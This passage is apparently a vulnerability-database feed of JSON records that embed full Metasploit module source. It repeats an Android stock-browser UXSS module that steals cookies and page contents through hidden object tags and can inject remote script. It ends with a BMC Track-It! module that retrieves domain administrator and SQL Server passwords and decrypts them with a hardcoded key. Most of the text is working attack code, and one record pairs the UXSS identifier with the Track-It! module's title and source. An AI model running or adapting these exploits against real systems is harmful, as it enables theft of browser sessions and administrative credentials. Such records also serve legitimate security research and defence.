document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", 
cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-16T13:39:27", "differentElements": ["sourceData"], "edition": 76}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "66526d54b1c2468cc1565418836e346e", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. 
Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-06-17T12:36:38", "history": [], "viewCount": 72, "enchantments": {"score": {"value": 3.0, "vector": "NONE", "modified": "2019-06-17T12:36:38"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310704464", "OPENVAS:1361412562310891819", "OPENVAS:1361412562310891822", "OPENVAS:1361412562310891818", "OPENVAS:1361412562310704463", "OPENVAS:1361412562310704462", "OPENVAS:1361412562310876485", "OPENVAS:1361412562310876491", "OPENVAS:1361412562310876483", "OPENVAS:1361412562310876489"]}, {"type": "freebsd", "idList": ["82C07DFA-9016-11E9-AF2F-712C38AA3E4C"]}, {"type": "threatpost", "idList": ["THREATPOST:1BBD92583C879148DB007D70752729A6"]}, {"type": "zdt", "idList": ["1337DAY-ID-32865", "1337DAY-ID-32866"]}, {"type": "xen", "idList": ["XSA-295"]}, {"type": "kitploit", "idList": ["KITPLOIT:2814971718646835741"]}], "modified": "2019-06-17T12:36:38"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-17T12:36:38", "differentElements": ["sourceData"], "edition": 77}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "db76ae0fa338dee6799587fb9bf8ebf6", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal 
Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-06-17T14:33:47", "history": [], "viewCount": 73, "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2019-06-17T14:33:47"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310704464", "OPENVAS:1361412562310891819", "OPENVAS:1361412562310891822", "OPENVAS:1361412562310891818", "OPENVAS:1361412562310704463", "OPENVAS:1361412562310704462", "OPENVAS:1361412562310876483", "OPENVAS:1361412562310876485", "OPENVAS:1361412562310876491", "OPENVAS:1361412562310876488"]}, {"type": "freebsd", "idList": ["82C07DFA-9016-11E9-AF2F-712C38AA3E4C"]}, {"type": "threatpost", "idList": ["THREATPOST:1BBD92583C879148DB007D70752729A6"]}, {"type": "zdt", "idList": ["1337DAY-ID-32865", "1337DAY-ID-32866"]}, {"type": "xen", "idList": ["XSA-295"]}, {"type": "kitploit", "idList": ["KITPLOIT:2814971718646835741"]}], "modified": "2019-06-17T14:33:47"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: 
https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} 
#{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = 
document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-17T14:33:47", "differentElements": ["sourceData"], "edition": 78}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "66526d54b1c2468cc1565418836e346e", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-07-03T23:43:27", "history": [], "viewCount": 73, "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2019-06-17T14:33:47"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310704464", "OPENVAS:1361412562310891819", "OPENVAS:1361412562310891822", "OPENVAS:1361412562310891818", "OPENVAS:1361412562310704463", "OPENVAS:1361412562310704462", "OPENVAS:1361412562310876483", "OPENVAS:1361412562310876485", "OPENVAS:1361412562310876491", 
"OPENVAS:1361412562310876488"]}, {"type": "freebsd", "idList": ["82C07DFA-9016-11E9-AF2F-712C38AA3E4C"]}, {"type": "threatpost", "idList": ["THREATPOST:1BBD92583C879148DB007D70752729A6"]}, {"type": "zdt", "idList": ["1337DAY-ID-32865", "1337DAY-ID-32866"]}, {"type": "xen", "idList": ["XSA-295"]}, {"type": "kitploit", "idList": ["KITPLOIT:2814971718646835741"]}], "modified": "2019-06-17T14:33:47"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-03T23:43:27", "differentElements": ["sourceData"], "edition": 79}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "db76ae0fa338dee6799587fb9bf8ebf6", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. 
Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-07-04T01:44:18", "history": [], "viewCount": 73, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2019-07-04T01:44:18"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310891843", "OPENVAS:1361412562310704474", "OPENVAS:1361412562310704475", "OPENVAS:1361412562310891842", "OPENVAS:1361412562310891840"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:B2D60F0B4C477E99E6B55ED9B1E86399"]}, {"type": "zdt", "idList": ["1337DAY-ID-32947", "1337DAY-ID-32941", "1337DAY-ID-32936", "1337DAY-ID-32949", "1337DAY-ID-32930", "1337DAY-ID-32946", "1337DAY-ID-32945", "1337DAY-ID-32933", "1337DAY-ID-32944", "1337DAY-ID-32938"]}], "modified": "2019-07-04T01:44:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and 
Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n 
obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-04T01:44:18", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 80}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "96f05bb20f324c56416516550f435455", "type": "metasploit", "bulletinFamily": "exploit", "title": "BMC / Numara Track-It! 
Domain Administrator and SQL Server User Password Disclosure", "description": "This module exploits an unauthenticated configuration retrieval .NET remoting service in Numara / BMC Track-It! v9 to v11.X, which can be abused to retrieve the Domain Administrator and the SQL server user credentials. This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107, 10.0.0.143 and 9.0.30.248.\n", "published": "2014-10-07T22:54:43", "modified": "2018-09-15T23:54:45", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4872", "https://seclists.org/fulldisclosure/2014/Oct/34"], "cvelist": ["CVE-2014-4872"], "lastseen": "2019-07-05T15:42:45", "history": [], "viewCount": 73, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2019-07-05T15:42:45"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-4872"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:128775", "PACKETSTORM:128594", "PACKETSTORM:146110"]}, {"type": "zdt", "idList": ["1337DAY-ID-22776", "1337DAY-ID-22737"]}, {"type": "exploitdb", "idList": ["EDB-ID:34924", "EDB-ID:35032", "EDB-ID:43883"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/TRACKIT_FILE_UPLOAD", "MSF:AUXILIARY/GATHER/TRACKIT_SQL_DOMAIN_CREDS"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105932"]}, {"type": "seebug", "idList": ["SSV:87308"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14007", "SECURITYVULNS:DOC:31163"]}, {"type": "cert", "idList": ["VU:121036"]}], "modified": "2019-07-05T15:42:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/trackit_sql_domain_creds.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 
'openssl'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BMC / Numara Track-It! Domain Administrator and SQL Server User Password Disclosure',\n 'Description' => %q{\n This module exploits an unauthenticated configuration retrieval .NET remoting\n service in Numara / BMC Track-It! v9 to v11.X, which can be abused to retrieve the Domain\n Administrator and the SQL server user credentials.\n This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107,\n 10.0.0.143 and 9.0.30.248.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2014-4872' ],\n [ 'OSVDB', '112741' ],\n [ 'US-CERT-VU', '121036' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2014/Oct/34' ]\n ],\n 'DisclosureDate' => 'Oct 7 2014'\n ))\n register_options(\n [\n OptPort.new('RPORT',\n [true, '.NET remoting service port', 9010])\n ])\n end\n\n\n def prepare_packet(bmc)\n #\n # ConfigurationService packet structure:\n #\n # packet_header_pre_packet_size\n # packet_size (4 bytes)\n # packet_header_pre_uri_size\n # uri_size (2 bytes)\n # packet_header_pre_uri\n # uri\n # packet_header_post_uri\n # packet_body_start_pre_method_size\n # method_size (1 byte)\n # method\n # packet_body_pre_type_size\n # type_size (1 byte)\n # packet_body_pre_type\n # type\n # @packet_terminator\n #\n # .NET remoting packet spec can be found at http://msdn.microsoft.com/en-us/library/cc237454.aspx\n #\n # P.S.: Lots of fun stuff can be obtained from the response. 
Highlights include:\n # - DatabaseServerName\n # - DatabaseName\n # - SchemaOwnerDatabaseUser\n # - EncryptedSystemDatabasePassword\n # - DomainAdminUserName\n # - DomainAdminEncryptedPassword\n #\n packet_header_pre_packet_size= [\n 0x2e, 0x4e, 0x45, 0x54, 0x01, 0x00, 0x00, 0x00,\n 0x00, 0x00\n ]\n\n packet_header_pre_uri_size = [\n 0x04, 0x00, 0x01, 0x01\n ]\n\n packet_header_pre_uri = [\n 0x00, 0x00\n ]\n\n # contains binary type (application/octet-stream)\n packet_header_post_uri = [\n 0x06, 0x00, 0x01, 0x01, 0x18, 0x00, 0x00, 0x00,\n 0x61, 0x70, 0x70, 0x6c, 0x69, 0x63, 0x61, 0x74,\n 0x69, 0x6f, 0x6e, 0x2f, 0x6f, 0x63, 0x74, 0x65,\n 0x74, 0x2d, 0x73, 0x74, 0x72, 0x65, 0x61, 0x6d,\n 0x00, 0x00\n ]\n\n packet_body_start_pre_method_size = [\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x15, 0x11, 0x00, 0x00, 0x00, 0x12\n ]\n\n packet_body_pre_type_size = [ 0x12 ]\n\n packet_body_pre_type = [ 0x01 ]\n\n @packet_terminator = [ 0x0b ]\n\n service = \"TrackIt.Core.ConfigurationService\".gsub(/TrackIt/,(bmc ? \"Trackit\" : \"Numara.TrackIt\"))\n method = \"GetProductDeploymentValues\".gsub(/TrackIt/,(bmc ? \"Trackit\" : \"Numara.TrackIt\"))\n type = \"TrackIt.Core.Configuration.IConfigurationSecureDelegator, TrackIt.Core.Configuration, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null\".gsub(/TrackIt/,(bmc ? 
\"TrackIt\" : \"Numara.TrackIt\"))\n\n uri = \"tcp://\" + rhost + \":\" + rport.to_s + \"/\" + service\n\n packet_size =\n packet_header_pre_uri_size.length +\n 2 + # uri_size\n packet_header_pre_uri.length +\n uri.length +\n packet_header_post_uri.length +\n packet_body_start_pre_method_size.length +\n 1 + # method_size\n method.length +\n packet_body_pre_type_size.length +\n 1 + # type_size\n packet_body_pre_type.length +\n type.length\n\n # start of packet and packet size (4 bytes)\n buf = packet_header_pre_packet_size.pack('C*')\n buf << Array(packet_size).pack('L*')\n\n # uri size (2 bytes)\n buf << packet_header_pre_uri_size.pack('C*')\n buf << Array(uri.length).pack('S*')\n\n # uri\n buf << packet_header_pre_uri.pack('C*')\n buf << uri.bytes.to_a.pack('C*')\n buf << packet_header_post_uri.pack('C*')\n\n # method name\n buf << packet_body_start_pre_method_size.pack('C*')\n buf << Array(method.length).pack('C*')\n buf << method.bytes.to_a.pack('C*')\n\n # type name\n buf << packet_body_pre_type_size.pack('C*')\n buf << Array(type.length).pack('C*')\n buf << packet_body_pre_type.pack('C*')\n buf << type.bytes.to_a.pack('C*')\n\n buf << @packet_terminator.pack('C*')\n\n return buf\n end\n\n\n def fill_loot_from_packet(packet_reply, loot)\n loot.each_key { |str|\n if loot[str] != nil\n next\n end\n if (index = (packet_reply.index(str))) != nil\n # after str, discard 5 bytes then get str_value\n size = packet_reply[index + str.length + 5,1].unpack('C*')[0]\n if size == 255\n # if we received 0xFF then there is no value for this str\n # set it to empty but not nil so that we don't look for it again\n loot[str] = \"\"\n next\n end\n loot[str] = packet_reply[index + str.length + 6, size]\n end\n }\n end\n\n\n def run\n packet = prepare_packet(true)\n\n sock = connect\n if sock.nil?\n fail_with(Failure::Unreachable, \"#{rhost}:#{rport.to_s} - Failed to connect to remoting service\")\n else\n print_status(\"#{rhost}:#{rport} - Sending packet to 
ConfigurationService...\")\n end\n sock.write(packet)\n\n # type of database (Oracle or SQL Server)\n database_type = \"DatabaseType\"\n # Database server name (host\\sid for Oracle or host\\login_name for SQL Server)\n database_server_name = \"DatabaseServerName\"\n database_name = \"DatabaseName\"\n schema_owner = \"SchemaOwnerDatabaseUser\"\n database_pw = \"EncryptedSystemDatabasePassword\"\n domain_admin_name = \"DomainAdminUserName\"\n domain_admin_pw = \"DomainAdminEncryptedPassword\"\n\n loot = {\n database_type => nil,\n database_server_name => nil,\n database_name => nil,\n schema_owner => nil,\n database_pw => nil,\n domain_admin_name => nil,\n domain_admin_pw => nil\n }\n\n # We only break when we have a timeout (up to 15 seconds wait) or have all we need\n while true\n ready = IO.select([sock], nil, nil, 15)\n if ready\n packet_reply = sock.readpartial(4096)\n else\n print_error(\"#{rhost}:#{rport} - Socket timed out after 15 seconds, try again if no credentials are dumped below.\")\n break\n end\n if packet_reply =~ /Service not found/\n # This is most likely an older Numara version, re-do the packet and send again.\n print_error(\"#{rhost}:#{rport} - Received \\\"Service not found\\\", trying again with new packet...\")\n sock.close\n sock = connect\n if sock.nil?\n fail_with(Failure::Unreachable, \"#{rhost}:#{rport.to_s} - Failed to connect to remoting service\")\n else\n print_status(\"#{rhost}:#{rport} - Sending packet to ConfigurationService...\")\n end\n packet = prepare_packet(false)\n sock.write(packet)\n packet_reply = sock.readpartial(4096)\n end\n\n fill_loot_from_packet(packet_reply, loot)\n\n if not loot.has_value?(nil)\n break\n end\n end\n sock.close\n\n # now set the values that were not found back to nil\n loot.each_key { |str| (loot[str] == \"\" ? 
loot[str] = nil : next) }\n\n if loot[database_type]\n print_good(\"#{rhost}:#{rport} - Got database type: #{loot[database_type]}\")\n end\n\n if loot[database_server_name]\n print_good(\"#{rhost}:#{rport} - Got database server name: #{loot[database_server_name]}\")\n end\n\n if loot[database_name]\n print_good(\"#{rhost}:#{rport} - Got database name: #{loot[database_name]}\")\n end\n\n if loot[schema_owner]\n print_good(\"#{rhost}:#{rport} - Got database user name: #{loot[schema_owner]}\")\n end\n\n if loot[database_pw]\n cipher = OpenSSL::Cipher.new(\"des\")\n cipher.decrypt\n cipher.key = 'NumaraTI'\n cipher.iv = 'NumaraTI'\n loot[database_pw] = cipher.update(Rex::Text.decode_base64(loot[database_pw]))\n loot[database_pw] << cipher.final\n print_good(\"#{rhost}:#{rport} - Got database password: #{loot[database_pw]}\")\n end\n\n if loot[domain_admin_name]\n print_good(\"#{rhost}:#{rport} - Got domain administrator username: #{loot[domain_admin_name]}\")\n end\n\n if loot[domain_admin_pw]\n cipher = OpenSSL::Cipher.new(\"des\")\n cipher.decrypt\n cipher.key = 'NumaraTI'\n cipher.iv = 'NumaraTI'\n loot[domain_admin_pw] = cipher.update(Rex::Text.decode_base64(loot[domain_admin_pw]))\n loot[domain_admin_pw] << cipher.final\n print_good(\"#{rhost}:#{rport} - Got domain administrator password: #{loot[domain_admin_pw]}\")\n end\n\n if loot[schema_owner] and loot[database_pw] and loot[database_type] and loot[database_server_name]\n # If it is Oracle we need to save the SID for creating the Credential Core, else we don't care\n if loot[database_type] =~ /Oracle/i\n sid = loot[database_server_name].split('\\\\')[1]\n else\n sid = nil\n end\n\n credential_core = report_credential_core({\n password: loot[database_pw],\n username: loot[schema_owner],\n sid: sid\n })\n\n # Get just the hostname\n db_address= loot[database_server_name].split('\\\\')[0]\n\n begin\n database_login_data = {\n address: ::Rex::Socket.getaddress(db_address, true),\n service_name: 
